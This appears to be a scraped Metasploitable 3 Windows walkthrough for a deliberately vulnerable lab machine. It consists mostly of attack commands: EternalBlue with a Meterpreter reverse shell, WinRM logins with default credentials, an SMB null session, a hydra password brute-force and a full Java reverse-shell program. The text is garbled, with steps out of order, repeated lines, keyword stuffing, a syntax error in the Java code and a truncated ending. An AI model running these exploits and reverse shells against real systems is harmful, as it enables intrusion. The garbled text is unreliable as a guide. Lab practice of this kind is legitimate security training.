Metasploitable 3 Windows Walkthrough (2026)

msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.102
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.56.101
msf6 > exploit

Success: You now have a SYSTEM level Meterpreter session. Game over. But if the exploit crashes the target (known issue), switch to ms17_010_psexec.

If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant):

crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"

Or use evil-winrm for an interactive shell: metasploitable 3 windows walkthrough

evil-winrm -i 192.168.56.103 -u administrator -p vagrant

Before we type a single exploit, we need the environment stable.

enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N   # null session

Mount share:

mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant

String host="192.168.56.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(), so=s.getOutputStream();
while(!s.isClosed()) {
  while(pi.available()>0) so.write(pi.read());
  while(pe.available()>0) so.write(pe.read());
  while(si.available()>0) po.write(si.read());
  so.flush();
  po.flush();
  Thread.sleep(50);
  try p.exitValue();break; catch (Exception e){}
};
p.destroy();
s.close();

On Kali listener:

nc -lvnp 4444

run autoroute -s 192.168.1.0/24 background Success: You now have a SYSTEM level Meterpreter session

Your initial foothold might be NETWORK SERVICE or a low-priv user. Time to escalate.

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb

The password is often vagrant or mcpassword123. (Check the Vagrant build files). If you have domain credentials (Metasploitable 3 has

© Hanasakumelody - Hanasakumelody
Email: